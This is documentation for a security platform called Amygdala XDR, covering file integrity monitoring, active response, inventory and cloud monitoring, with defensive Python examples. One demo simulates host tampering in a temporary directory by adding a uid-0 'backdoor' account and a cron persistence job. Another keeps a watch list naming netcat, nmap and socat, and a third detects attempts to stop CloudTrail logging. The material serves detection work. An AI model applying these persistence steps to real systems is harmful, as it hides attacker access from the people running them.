AMYGDALA XDR

Amygdala XDR - Extended Detection, Response & Compliance Monitoring Solution

Amygdala XDR is a security detection, visibility, and compliance platform that enables organizations to protect their IT infrastructure from threats and respond to them in real time. It builds on widely used security tools, including Elasticsearch, Kibana, and OSSEC. It provides real-time threat detection, incident response capabilities, and centralized logging and analysis of security events across an organization's IT infrastructure, including servers, endpoints, cloud environments, containers, and networks.

Additionally, the Amygdala XDR platform integrates with other security tools, including intrusion detection and prevention systems (IDS/IPS), vulnerability scanners, and SIEM solutions, to provide a comprehensive security solution.

Overview

Amygdala XDR is composed of three primary components: agents, servers, and a web-based user interface (WUI). The agents are installed on endpoints to collect system logs and security events. The collected data is transmitted to the Amygdala XDR server for analysis and processing. The server uses Elasticsearch and Kibana to index and visualize the collected data, enabling real-time alerting and reporting for security teams.

In addition to its core components, Amygdala XDR includes decoders and a ruleset that help identify known and unknown threats, as well as compliance monitoring capabilities that help organizations meet regulatory and industry standards. Amygdala XDR provides a robust and adaptable security platform that enables organizations to detect and respond to security incidents in real time, and the platform's design facilitates community contributions and customization to meet specific security needs.

Industry Difference

Improved Efficiency

Amygdala XDR automates routine tasks such as threat detection, incident response, and remediation. This automation helps security teams work more efficiently and frees time for other critical tasks.

Enhanced Security Posture

By providing visibility across an organization's IT infrastructure, Amygdala XDR helps identify vulnerabilities, threats, and risks that could compromise security, so the organization can take proactive measures to mitigate them and improve its overall security posture.

Better Compliance Management

Amygdala XDR provides tools for managing compliance requirements. It helps organizations track their compliance status, audit their security and data-handling practices, and generate reports that demonstrate compliance with industry standards and regulations.

Reduced Costs

A comprehensive security solution can reduce the costs associated with security breaches, compliance violations, and other security incidents. By identifying risks and vulnerabilities early, organizations can mitigate them before they turn into a costly incident.

Improved Customer Trust

Amygdala XDR helps build trust between an organization and its customers. By demonstrating a commitment to security and compliance, organizations can reassure customers that their data is protected.

In conclusion, Amygdala XDR, as a comprehensive security, detection, visibility, and compliance solution, improves efficiency, enhances security posture, reduces costs, and builds customer trust.


Features

Amygdala XDR Key Features

Real-time Threat Detection

Amygdala XDR detects known and unknown security threats in real time by analyzing security events and logs from across an organization's IT infrastructure.

Incident Response

Amygdala XDR's incident response capabilities allow security teams to respond to incidents quickly and effectively, reducing the impact of an attack.

Centralized Logging and Analysis

Amygdala XDR collects and analyzes security events and logs from servers, endpoints, cloud environments, containers, and networks, providing centralized logging and analysis.

Integration with Other Security Tools

Amygdala XDR integrates with other security tools, including IDS/IPS, vulnerability scanners, and SIEM solutions, to provide a holistic security solution.

Compliance Monitoring

Amygdala XDR offers compliance monitoring capabilities that help organizations meet industry and regulatory standards.

Amygdala XDR Benefits

Improved Security

Amygdala XDR provides real-time threat detection and incident response capabilities that help organizations improve their security posture.

Increased Visibility

Amygdala XDR collects and analyzes security events and logs from across an organization's IT infrastructure, giving increased visibility into security threats.

Faster incident response

Amygdala XDR's incident response capabilities enable security teams to respond to security incidents effectively, reducing the impact of an attack.

Compliance

Amygdala XDR's compliance monitoring capabilities help organizations ensure that they meet industry and regulatory standards.

Lower costs

Amygdala XDR is a SIEM platform that helps organizations lower their security costs compared to proprietary solutions.

Customization

The platform's design enables community contributions and customization to satisfy specific security requirements.


Amygdala XDR Security Management

Amygdala XDR is a security management platform that provides endpoint detection and response (EDR), security analytics, and threat detection capabilities. It is designed to help organizations monitor their security posture, identify security threats and respond to them in a timely manner. It consists of a number of different components, including agents, a server, and a web-based management console. The agents are installed on endpoints and collect security-related data, which is then forwarded to the server for analysis. The server processes the data and provides alerts and reports to the management console.

Amygdala XDR uses a variety of techniques to detect threats in real-time, including signature-based detection, behavioral analysis, and anomaly detection.

Multi-tenancy

Amygdala XDR multi-tenancy supports multiple independent groups, or tenants, within a single Amygdala XDR cluster. Each tenant has its own index patterns, mappings, queries, dashboards, and visualizations. It is useful where multiple applications, customers, or teams need to share a common Elasticsearch infrastructure while keeping their data separated and isolated from each other.

Amygdala XDR provides several options for implementing multi-tenancy:

Index-based multi-tenancy

In index-based multi-tenancy, each tenant is assigned a separate set of indices. Index names are prefixed with a unique identifier for each tenant, such as "tenant1-" or "tenant2-", and Kibana can be configured to show only the indices of a particular tenant to that tenant's users. Hiding indices in Kibana is a usability measure, not an access control: the same restriction must be enforced in the indexer's security layer (per-index permissions on the user's role), or any user with direct API access can query other tenants' indices.

Namespace-based multi-tenancy

In namespace-based multi-tenancy, each tenant is assigned a unique namespace that isolates its data from other tenants. A namespace is a logical grouping of Elasticsearch resources, including indices, documents, queries, and visualizations; users of a tenant can only see and interact with resources within their own namespace.

Role-based multi-tenancy

In role-based multi-tenancy, each tenant is assigned a set of roles that determine the level of access and permissions for that tenant's users. For example, one tenant may have a "read-only" role that only allows users to view data, while another has a "read-write" role that also allows users to create and modify data.

Overall, multi-tenancy lets users share a common Amygdala XDR infrastructure while keeping their data separate and secure, and gives organizations a flexible, scalable way to support multiple applications, customers, or teams within a single cluster.
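The following is an added example, not code from Amygdala XDR: a tenant-scoped authorization check of the kind the indexer's security layer has to perform for index-based multi-tenancy combined with read-only/read-write roles. The tenant names, the "tenant-" prefix convention and the role names are assumptions for the example. It shows two traps that a naive prefix match falls into: the separator must be part of the prefix (otherwise "tenant1*" also matches "tenant10-*"), and multi-index lists, exclusions and leading wildcards must be refused rather than pattern-matched.

```python
"""Tenant-scoped index access check (added example, not Amygdala XDR code)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class TenantUser:
    name: str
    tenant: str   # assumed tenant identifier, e.g. "tenant1"
    role: str     # assumed role names: "read-only" or "read-write"


READ_METHODS = {"GET", "HEAD"}
WRITE_METHODS = {"POST", "PUT", "DELETE"}


def tenant_prefix(tenant: str) -> str:
    # The separator is part of the prefix: "tenant1" alone would also match "tenant10-*".
    return f"{tenant}-"


def pattern_in_tenant(pattern: str, tenant: str) -> bool:
    """True only if every index the pattern can expand to carries the tenant's prefix."""
    # Multi-index lists, exclusions, _all and leading wildcards can reach other tenants'
    # data, so they are refused outright instead of being pattern-matched.
    if not pattern or "," in pattern or pattern[0] in "*?-_":
        return False
    # The literal part before the first wildcard must already contain the full prefix.
    literal = pattern.split("*", 1)[0].split("?", 1)[0]
    return literal.startswith(tenant_prefix(tenant))


def authorize(user: TenantUser, method: str, index_pattern: str) -> tuple:
    """Decide (allowed, reason) for one request against one index or index pattern."""
    method = method.upper()
    if not pattern_in_tenant(index_pattern, user.tenant):
        return False, f"{index_pattern!r} is outside tenant {user.tenant!r}"
    if method in READ_METHODS:
        return True, "read allowed"
    if method in WRITE_METHODS and user.role == "read-write":
        return True, "write allowed"
    return False, f"role {user.role!r} may not {method} {index_pattern!r}"
```

The check is deliberately strict: a pattern that cannot be proven to stay inside the tenant is denied, which is the safe failure mode for a shared cluster.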

Dev Tools

Dev Tools is a console that lets developers and analysts interact with Amygdala XDR's indexer directly. It sends requests straight to Elasticsearch and shows the results in real time. The Dev Tools tab is opened from the Dev Tools icon on the left-hand side of the UI. Because the console forwards each request with the privileges of the logged-in user, access to it should be limited to roles that are meant to have direct API access to the indexer.

Console

The console lets developers send requests to Amygdala XDR through a user-friendly interface. Requests use the REST API, and the console supports the HTTP methods GET, POST, PUT, DELETE, and more.

Autocomplete

The console provides an autocomplete module for quickly building complex queries. It helps developers avoid syntax errors and improves the speed and accuracy of their queries.

Snippets

Dev Tools provides a range of snippets that developers can use to quickly build common queries. Snippets can be customized and saved for later use.

Import/Export

Dev Tools allows developers to import and export requests as JSON files, so requests can be shared between team members or between different instances of the UI.

API Documentation

Dev Tools provides documentation for the Amygdala XDR REST API, which can be used as a reference when building requests or troubleshooting issues.


Roadmap for each Module

File Integrity Monitoring

The Amygdala XDR File Integrity Monitoring (FIM) module lets your organization detect and monitor changes to files, file systems, directories, and other critical system objects on servers and workstations, in order to detect unauthorized modification or tampering. It uses an agent-based approach: the agent periodically scans the file system and sends data to the centralized Amygdala XDR manager, which can immediately alert administrators to any change or suspicious activity.

Technical Description

The FIM module tracks a variety of file parameters such as permissions, ownership, content, size, and timestamps. It detects changes to critical system files, configuration files, or user-generated files in specific directories. In addition to real-time alerts, the module retains historical data that can be used to investigate past events and to track changes over an extended period. It can be customized to exclude certain files or directories from monitoring, and it helps satisfy regulatory requirements, such as PCI DSS or HIPAA, that mandate file integrity monitoring.

The agent runs on the target system and periodically scans the file system for changes. It can be configured to monitor specific directories, files, or file attributes. For each monitored file it collects metadata such as size, timestamps, permissions, and ownership, and it calculates a hash of the file content, which serves as a fingerprint: any change to the content changes the hash, even when size and timestamps are preserved. Overall, the FIM module detects and responds to changes to critical files and system objects on your servers and workstations, providing both real-time alerts and the historical data needed to investigate past events and track modifications over time.
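As an added example that is not the Amygdala XDR agent's code, the block below implements the baseline-and-diff approach the paragraph describes: it records a SHA-256 hash and the permission, ownership, size and mtime metadata of every regular file under a directory, honours an exclusion list, and reports which attributes changed between two scans. The sample tree (a fake etc/passwd, etc/sudoers and a cron drop-in) is constructed in a temporary directory inside demo() so the example runs offline; no real system files are touched.

```python
"""Baseline-and-diff file integrity check (added example, not the Amygdala XDR FIM agent)."""
import hashlib
import os
import stat
import tempfile


def file_record(path: str) -> dict:
    """Metadata plus a SHA-256 content hash for one regular file."""
    st = os.stat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return {
        "sha256": digest.hexdigest(),
        "size": st.st_size,
        "mode": stat.S_IMODE(st.st_mode),   # permission bits only
        "uid": st.st_uid,
        "gid": st.st_gid,
        "mtime": int(st.st_mtime),
    }


def snapshot(root: str, exclude: tuple = ()) -> dict:
    """Record every regular file under root, skipping excluded relative paths and symlinks."""
    records = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # Prune excluded directories so they are never walked at all.
        dirnames[:] = [d for d in dirnames
                       if os.path.normpath(os.path.join(rel_dir, d)) not in exclude]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if rel in exclude or os.path.islink(full) or not os.path.isfile(full):
                continue
            records[rel] = file_record(full)
    return records


def diff_snapshots(old: dict, new: dict) -> list:
    """Report added, deleted and modified files; for modifications, name the changed attributes."""
    events = []
    for rel in sorted(set(old) | set(new)):
        if rel not in old:
            events.append({"path": rel, "event": "added"})
        elif rel not in new:
            events.append({"path": rel, "event": "deleted"})
        else:
            changed = [k for k in old[rel] if old[rel][k] != new[rel][k]]
            if changed:
                events.append({"path": rel, "event": "modified", "changed": changed})
    return events


def demo() -> list:
    """Constructed scenario: baseline a fake system tree, tamper with it, return the diff."""
    with tempfile.TemporaryDirectory() as root:
        etc = os.path.join(root, "etc")
        os.makedirs(os.path.join(etc, "cron.d"))
        os.makedirs(os.path.join(root, "tmp"))
        with open(os.path.join(etc, "passwd"), "w") as fh:
            fh.write("root:x:0:0::/root:/bin/bash\n")
        with open(os.path.join(etc, "sudoers"), "w") as fh:
            fh.write("root ALL=(ALL) ALL\n")
        os.chmod(os.path.join(etc, "sudoers"), 0o440)
        with open(os.path.join(root, "tmp", "scratch"), "w") as fh:
            fh.write("noise\n")
        baseline = snapshot(root, exclude=("tmp",))

        # Tampering: extra uid-0 account, world-writable sudoers, new cron job, churn in excluded tmp.
        with open(os.path.join(etc, "passwd"), "a") as fh:
            fh.write("backdoor:x:0:0::/:/bin/sh\n")
        os.chmod(os.path.join(etc, "sudoers"), 0o666)
        with open(os.path.join(etc, "cron.d", "persist"), "w") as fh:
            fh.write("* * * * * root /tmp/x\n")
        with open(os.path.join(root, "tmp", "scratch"), "a") as fh:
            fh.write("more noise\n")
        return diff_snapshots(baseline, snapshot(root, exclude=("tmp",)))
```

Note that a scheduled scan only sees the state at scan time: a file modified and restored between two scans leaves no trace in this model, which is why real-time monitoring backed by file-system change notifications is listed separately below.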

Features

Real-time monitoring

The FIM module watches your file system and detects changes as soon as they occur.

File attributes monitoring

The FIM module monitors a wide range of file attributes, including content, permissions, ownership, and timestamps.

Historical data

The FIM module retains historical data, allowing administrators to investigate past events and track changes over time.

Threat Detection

The FIM module detects malicious activity such as malware infections or unauthorized changes to critical files.

Compliance

The FIM module helps your organization comply with regulatory requirements, such as PCI DSS or HIPAA, that mandate file integrity monitoring.

Configuration Management

The FIM module helps keep your systems' configuration under control by detecting changes that may lead to instability or downtime.

Incident response

The FIM module helps you respond to security incidents more quickly and effectively by providing real-time alerts and historical data.

Technology-Supported, Protocols

Here are some of the technologies and protocols supported by Amygdala XDR File Integrity Monitoring.

Operating Systems

The FIM module supports a variety of operating systems, including Windows, Linux, Unix, and macOS.

File Systems

The FIM module supports a variety of file systems, including NTFS, FAT, EXT4, XFS, and HFS+; it must be compatible with the target file system to function properly. Data is transported over standard network protocols (TCP or UDP between agent and manager, HTTP/HTTPS for the web interface).

Module Dependency

Here are the key dependencies of Amygdala XDR File Integrity Monitoring:

The FIM module depends on the operating system to access and monitor files and directories, and must be compatible with the target operating system to function properly.

Active Response

Overview

The Active Response module of Amygdala XDR lets your organization automate responses to security events. It allows immediate action to be taken when an alert is triggered, without manual intervention. The module provides a variety of actions:

Blocking IP addresses

When an alert is triggered, Amygdala XDR can automatically block the IP address associated with the event. The block is applied at the host firewall or network layer, preventing further attacks from the same source.

Terminating processes

When an alert is triggered, Amygdala XDR can automatically terminate the process associated with the event, stopping malicious software from continuing to run on the system.

Quarantining files

When an alert is triggered, Amygdala XDR can automatically quarantine the files associated with the event, preventing malware from spreading to other systems.

Running scripts

When an alert is triggered, Amygdala XDR can automatically run scripts that perform custom actions, automating the response to specific types of events.

Notifying administrators

When an alert is triggered, Amygdala XDR can automatically notify administrators via email, SMS, or other methods, ensuring they are aware of the event and can take appropriate action.

Features

Here are some of the key features of the Amygdala XDR Active Response module:

Automated Response

Active Response automates your security operations, allowing administrators to respond quickly and efficiently to security events. It reduces the time between detecting and responding to an incident, helping to minimize the potential impact of an attack.

Customizable Actions

Response actions are defined by the administrator: pre-defined rules and policies determine which alerts trigger a response, and the built-in actions (blocking IP addresses, terminating processes, quarantining files, notifying administrators) can be supplemented with custom scripts for event types that need a tailored response.

Integrated Workflow

The Active Response module is integrated with the broader Amygdala XDR platform, which provides a centralized console for managing security events. Administrators can see alerts in real time, evaluate the severity of each alert, and take appropriate action.

Regulatory Compliance

The Active Response module helps organizations meet compliance requirements by providing automated responses that are consistent with industry best practices and regulatory standards, helping them avoid the fines and other penalties associated with non-compliance.

Scalability

The Active Response module is designed for large and complex environments, making it suitable for organizations of all sizes. It can be deployed on-premises or in the cloud and integrated with other security tools to provide a comprehensive security solution.

Technical Description

When a security event is detected by the Amygdala XDR agent, an alert is generated and sent to the Amygdala XDR server for processing. The server evaluates the alert's severity and relevance and, based on pre-defined rules and policies, determines whether an active response is required. If it is, the server triggers the appropriate response action, such as blocking an IP address, terminating a process, quarantining a file, or running a script.

The response action is executed on the affected system(s). For example, if the response is to block an IP address, the server sends a command to the host firewall or network device to drop traffic from the offending address. The server logs the response and notifies the appropriate administrators, which provides a record of the response and lets administrators review and verify its effectiveness. Two safeguards belong in any such policy: blocks should expire after a timeout, and the addresses of management hosts and of the manager itself should never be blockable, because an attacker who can make an alert carry a chosen source address could otherwise turn the responder into a denial of service against legitimate hosts.
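The decision step described above, as an added example that is not Amygdala XDR's own code: alerts are matched against policies keyed on rule id and minimum alert level, and the result is a dry-run plan of actions rather than executed commands. The rule ids, the policy table, the protected address ranges and the iptables/kill command strings are all assumptions for the example; what it demonstrates is the block timeout, the never-block list, and the refusal to pass an unparsed source address or an init/unknown pid to a shell command.

```python
"""Active-response policy evaluation as a dry run (added example, not Amygdala XDR code)."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Assumed: management network and loopback ranges that the responder must never block,
# otherwise a forged alert can cut the manager and the admins off from the host.
NEVER_BLOCK = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "10.0.0.0/24", "::1/128")]


@dataclass
class Alert:
    rule_id: int
    level: int
    agent: str
    src_ip: Optional[str] = None
    pid: Optional[int] = None


@dataclass
class Policy:
    rule_ids: frozenset
    min_level: int
    action: str          # "block_ip", "kill_process" or "notify"
    timeout: int = 600   # seconds after which an IP block is lifted again


# Assumed rule ids: 100100 = brute force from a source address, 100200 = known-bad process.
POLICIES = [
    Policy(frozenset({100100}), min_level=10, action="block_ip", timeout=600),
    Policy(frozenset({100200}), min_level=12, action="kill_process"),
    Policy(frozenset({100100, 100200}), min_level=7, action="notify"),
]


def plan_response(alert: Alert, policies: List[Policy] = POLICIES) -> List[dict]:
    """Return the response actions a manager would trigger for one alert, without running them."""
    plan = []
    for policy in policies:
        if alert.rule_id not in policy.rule_ids or alert.level < policy.min_level:
            continue
        if policy.action == "block_ip":
            try:
                ip = ipaddress.ip_address(alert.src_ip or "")
            except ValueError:
                # Decoders can be fed junk; never hand an unparsed string to a firewall command.
                plan.append({"action": "notify",
                             "reason": f"unparseable source address {alert.src_ip!r}"})
                continue
            if any(ip in net for net in NEVER_BLOCK):
                plan.append({"action": "notify", "reason": f"refused to block protected address {ip}"})
                continue
            plan.append({
                "action": "block_ip", "agent": alert.agent, "ip": str(ip), "timeout": policy.timeout,
                # Illustrative host-firewall command; the matching unblock is "-D" after the timeout.
                "command": f"iptables -I INPUT -s {ip} -j DROP",
            })
        elif policy.action == "kill_process":
            if alert.pid is None or alert.pid <= 1:
                continue  # never signal init or an unknown pid
            plan.append({"action": "kill_process", "agent": alert.agent, "pid": alert.pid,
                         "command": f"kill -9 {alert.pid}"})
        elif policy.action == "notify":
            plan.append({"action": "notify",
                         "reason": f"rule {alert.rule_id} level {alert.level} on {alert.agent}"})
    return plan
```

Keeping the planner separate from the executor is deliberate: the plan can be logged and reviewed, and the executor that runs on the agent only ever receives a validated address or pid.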

Technology-Supported, Protocols

Operating Systems

The Active Response module runs on Windows, Linux, and macOS, so administrators can respond to security events on any type of system in their environment.

Network Devices

The Active Response module can drive network devices such as routers, switches, and firewalls, so responses such as blocking traffic from a particular IP address can be automated at the network level.

Cloud Services

The Active Response module can be integrated with cloud services such as AWS, Azure, and Google Cloud, so responses to security events in cloud environments can be automated.

Databases

The Active Response module can be used with databases such as MySQL, PostgreSQL, and Microsoft SQL Server, so responses to security events that affect databases can be automated.

Protocols

The Active Response module supports various protocols, including TCP, UDP, ICMP, and HTTP, so responses to security events involving these protocols can be automated.

Module Dependency

Key dependencies of the Active Response module

Active Response depends on the Amygdala XDR agent on the affected system to execute the response locally, on the manager's rules and policies to decide when a response is required, and, for network-level blocking, on the firewall or network device that the manager sends the block command to. Without these, alerts are still generated but the automated response cannot be executed.

System Inventory

The System Inventory module of Amygdala XDR provides an automated way to collect information about the hardware and software configuration of the systems monitored by Amygdala XDR, helping organizations maintain an up-to-date inventory of all the systems in their environment.

Hardware Information: the module collects information about the hardware components of a system, such as processor, memory, storage devices, and network interfaces.

Software Information: the module collects information about the installed software on a system, including the operating system, system patches, and installed applications.

System Events: the module also collects system events, such as logins, logouts, and system reboots. This information can be used to monitor system availability and detect security events.

Features

Automated Data Collection

The System Inventory module automatically collects information about the hardware and software configuration of all the systems in the environment, eliminating manual data collection.

Asset Tracking

The module helps your organization maintain an up-to-date inventory of all systems in the environment, making it easier to track assets and ensure compliance with security policies.

Monitoring System Changes

The module detects changes to system configuration, such as the installation of new software or changes to system settings, helping to identify potential security risks.

Integration with Other Amygdala XDR Modules

The module integrates with other Amygdala XDR modules, such as the Vulnerability Detection module and the Compliance module, to provide a comprehensive view of the organization's security posture.

Technical Description

The Amygdala XDR System Inventory module collects information about the hardware components of a system, such as processor, memory, storage devices, and network interfaces, using system commands and utilities such as "lshw", "dmidecode", and "ifconfig". It collects information about installed software, including the operating system, system patches, and installed applications, using package-management tools such as "dpkg", "rpm", and "yum". It also collects system events, such as logins, logouts, and system reboots, from system log files and event logs.
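To show what "monitoring system changes" means for the software inventory, here is an added example that is not the product's inventory collector: it parses the tab-separated output of dpkg-query (the sample output is constructed, and the versions in it are illustrative), treats only packages in the "installed" state as present, and diffs two scans into installed/removed/version-changed events. The watch list of dual-use tools is an assumption added for the example.

```python
"""Package-inventory diff between two scans (added example, not the Amygdala XDR inventory collector)."""
from typing import Dict, List

# Constructed output of: dpkg-query -W -f='${Package}\t${Version}\t${db:Status-Status}\n'
BASELINE = """\
curl\t7.88.1-10\tinstalled
openssh-server\t1:9.2p1-2\tinstalled
sudo\t1.9.13p3-1\tinstalled
"""
CURRENT_SCAN = """\
curl\t7.88.1-10\tconfig-files
netcat-traditional\t1.10-47\tinstalled
openssh-server\t1:9.2p1-2\tinstalled
sudo\t1.9.13p3-1+deb12u1\tinstalled
"""

# Assumed watch list: dual-use tools whose appearance on a server deserves a closer look.
WATCHLIST = {"netcat-traditional", "nmap", "socat"}


def parse_dpkg(text: str) -> Dict[str, str]:
    """Map package -> version for packages that are actually installed (not leftover config)."""
    packages = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, version, status = line.split("\t")
        if status == "installed":
            packages[name] = version
    return packages


def diff_inventory(old: Dict[str, str], new: Dict[str, str]) -> List[dict]:
    """Turn two inventories into change events, ordered by package name."""
    events = []
    for name in sorted(set(old) | set(new)):
        if name not in old:
            event = {"package": name, "event": "installed", "version": new[name],
                     "severity": "high" if name in WATCHLIST else "low"}
        elif name not in new:
            event = {"package": name, "event": "removed", "version": old[name], "severity": "low"}
        elif old[name] != new[name]:
            event = {"package": name, "event": "version_changed",
                     "from": old[name], "to": new[name], "severity": "low"}
        else:
            continue
        events.append(event)
    return events
```

A package left in the "config-files" state (removed but not purged) is reported as removed, which is what an analyst usually wants to know; a purge would produce the same event.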

Technology-Supported, Protocols

The System Inventory module uses Amygdala XDR agents to collect system information, which is sent to the Amygdala XDR Manager for analysis and reporting. The agents collect system information from various operating systems, including Linux, Windows, macOS, and FreeBSD.

Module Dependency

The System Inventory module in Amygdala XDR depends on the following to function properly:

Agents

The module relies on agents to collect system information from the monitored systems. Without agents, the module cannot collect data.

Amygdala XDR Manager

The agents send the collected system information to the Amygdala XDR Manager, where it is analyzed and reported on. Without the manager, the inventory data cannot be processed or viewed.

Configuration Files

The module uses configuration files to determine what data to collect and how to collect it. Without proper configuration, the module may not collect the desired data, or may collect too much data and cause performance issues.

Operating System APIs and Utilities

The module relies on operating system APIs and utilities to collect system information, such as "lshw" and "dmidecode" on Linux or WMI on Windows. Without them, the module may not be able to collect all desired information.


Cloud Security

The Cloud Security module of Amygdala XDR is designed to provide security monitoring and threat detection for cloud environments, specifically Amazon Web Services (AWS) and Microsoft Azure. This module is built on top of the Amygdala XDR platform and leverages its capabilities to provide comprehensive security monitoring and analysis for cloud environments. The Cloud Security module provides visibility into cloud infrastructure, such as virtual machines, storage, and networks, and monitors for security events and threats. It also integrates with cloud provider APIs to collect metadata, such as configuration and usage information, to provide a complete view of the cloud environment.

Features

Configuration Assessment

The module assesses the configuration of your cloud infrastructure, such as virtual machines and storage, to identify misconfigurations that could lead to security issues.

Threat Detection

The module uses threat intelligence and behavior analysis to detect security threats in the cloud environment.

Log Analysis

The module collects and analyzes log data from cloud infrastructure to identify security events and anomalies.

Compliance Monitoring

The module helps your organization ensure compliance with regulatory requirements, such as HIPAA or PCI DSS, by monitoring cloud infrastructure for non-compliant activity.

Real-time Alerts

The module generates real-time alerts for security events and threats in the cloud environment.

Technical Description

The Cloud Security module of Amygdala XDR is designed to provide security monitoring and threat detection for cloud environments, specifically Amazon Web Services (AWS) and Microsoft Azure. The module consists of several components that work together to provide comprehensive security monitoring and analysis for cloud environments.

The Amygdala XDR Agent is installed on cloud instances and collects log data and system metrics from the instance. It also performs configuration assessment checks to identify misconfigurations that could lead to security issues.

Technology-Supported, Protocols

The Cloud Security module of Amygdala XDR supports several technologies and protocols for monitoring and securing cloud environments, including:

Amazon Web Services (AWS)

The Cloud Security module supports AWS and uses AWS APIs to collect metadata, such as configuration and usage information, from cloud infrastructure.

Microsoft Azure

The module also supports Microsoft Azure and uses Azure APIs to collect metadata from Azure resources.

Amygdala XDR API

The Cloud Security module uses the Amygdala XDR API to communicate with cloud provider APIs and collect metadata from cloud infrastructure.

Syslog

The module can collect log data from cloud infrastructure using the Syslog protocol.

CloudTrail

The Cloud Security module can collect CloudTrail logs from AWS to monitor user activity and API usage in the cloud environment.

Security Groups

The module can monitor security groups in AWS and Azure to ensure that only authorized traffic is allowed.
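The CloudTrail and security-group monitoring described above, as an added example that is not Amygdala XDR code: four detections run over constructed CloudTrail records that follow the service's JSON layout (a console login without MFA, a security-group rule opening an admin port to 0.0.0.0/0, use of the root account, and an attempt to stop trail logging). The records, account details and rule names are constructed for the example; the field names (userIdentity.type, additionalEventData.MFAUsed, requestParameters.ipPermissions.items[].ipRanges.items[].cidrIp) are the ones CloudTrail uses.

```python
"""Detections over constructed CloudTrail records (added example, not Amygdala XDR code)."""
from typing import List

ADMIN_PORTS = {22, 3389}
WORLD = {"0.0.0.0/0", "::/0"}
TRAIL_TAMPERING = {"StopLogging", "DeleteTrail", "UpdateTrail"}

# Constructed records in CloudTrail's JSON layout (a delivered log file is {"Records": [...]}).
SAMPLE_TRAIL = {"Records": [
    {"eventTime": "2024-03-04T10:00:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "sourceIPAddress": "203.0.113.5", "additionalEventData": {"MFAUsed": "No"},
     "responseElements": {"ConsoleLogin": "Success"}},
    {"eventTime": "2024-03-04T10:05:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "IAMUser", "userName": "bob"}, "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"groupId": "sg-0123456789abcdef0", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
          "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventTime": "2024-03-04T10:06:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "IAMUser", "userName": "carol"}, "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"groupId": "sg-0fedcba9876543210", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,
          "ipRanges": {"items": [{"cidrIp": "10.0.0.0/8"}]}}]}}},
    {"eventTime": "2024-03-04T10:30:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "userIdentity": {"type": "Root"},
     "sourceIPAddress": "203.0.113.9", "requestParameters": {"name": "main-trail"}},
]}


def exposed_admin_ports(perm: dict) -> set:
    """Admin ports that one ipPermissions entry opens to the whole Internet."""
    ranges = perm.get("ipRanges", {}).get("items", []) + perm.get("ipv6Ranges", {}).get("items", [])
    if not any(r.get("cidrIp") in WORLD or r.get("cidrIpv6") in WORLD for r in ranges):
        return set()
    if perm.get("ipProtocol") == "-1":        # "-1" means every protocol and every port
        return set(ADMIN_PORTS)
    lo, hi = perm.get("fromPort"), perm.get("toPort")
    if lo is None or hi is None:
        return set()
    return {p for p in ADMIN_PORTS if lo <= p <= hi}


def analyze_trail(trail: dict) -> List[dict]:
    """Run the four detections over every record and return the findings in record order."""
    findings = []
    for rec in trail["Records"]:
        ident = rec.get("userIdentity", {})
        base = {"time": rec["eventTime"], "who": ident.get("userName") or ident.get("type"),
                "src": rec.get("sourceIPAddress")}
        if ident.get("type") == "Root":
            findings.append({**base, "rule": "root_account_activity", "event": rec["eventName"]})
        if (rec["eventName"] == "ConsoleLogin"
                and rec.get("responseElements", {}).get("ConsoleLogin") == "Success"
                and rec.get("additionalEventData", {}).get("MFAUsed") != "Yes"):
            findings.append({**base, "rule": "console_login_without_mfa"})
        if rec["eventName"] == "AuthorizeSecurityGroupIngress":
            params = rec.get("requestParameters", {})
            ports = set()
            for perm in params.get("ipPermissions", {}).get("items", []):
                ports |= exposed_admin_ports(perm)
            if ports:
                findings.append({**base, "rule": "security_group_admin_port_open_to_world",
                                 "group": params.get("groupId"), "ports": sorted(ports)})
        if rec["eventSource"] == "cloudtrail.amazonaws.com" and rec["eventName"] in TRAIL_TAMPERING:
            findings.append({**base, "rule": "cloudtrail_logging_tampered", "event": rec["eventName"]})
    return findings
```

The security-group check is done on the API call that changes the rule rather than on the resulting configuration, which is what turns a periodic configuration assessment into a real-time alert.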

Module Dependency

Amygdala XDR Agent

The Amygdala XDR Agent is installed on cloud instances and is responsible for collecting log data and system metrics from the instance. The Cloud Security module depends on the Amygdala XDR Agent to collect data from cloud infrastructure.

Amygdala XDR Manager

The Amygdala XDR Manager is the central component of the Cloud Security module and is responsible for processing and analyzing log data, system metrics, and metadata collected from cloud infrastructure. The module depends on the Amygdala XDR Manager to generate real-time alerts for security events and threats in the cloud environment.

Amygdala XDR API

The Cloud Security module uses the Amygdala XDR API to communicate between the Amygdala XDR Manager and cloud provider APIs to collect metadata from cloud infrastructure.

Cloud Provider APIs

The Cloud Security module depends on cloud provider APIs, such as AWS APIs and Azure APIs, to collect metadata from cloud infrastructure.

Log Data Analysis

Amygdala XDR provides log data analysis as one of its core modules. It enables your organization to collect, process, and analyze log data from a wide range of sources to gain insight into system and network activity. Here is an overview of how log data analysis works in Amygdala XDR.

Amygdala XDR collects log data from a variety of sources, including system logs, application logs, network devices, and cloud services. It supports a wide range of log formats and provides pre-built decoders for common log types; decoders parse and normalize log data into a common format, making it easier to search, analyze, and correlate events across different sources. Amygdala XDR then applies built-in rules and correlation logic to identify potential security threats, including patterns of behavior that may indicate an attack, such as repeated login failures, unusual file access patterns, or suspicious network traffic.
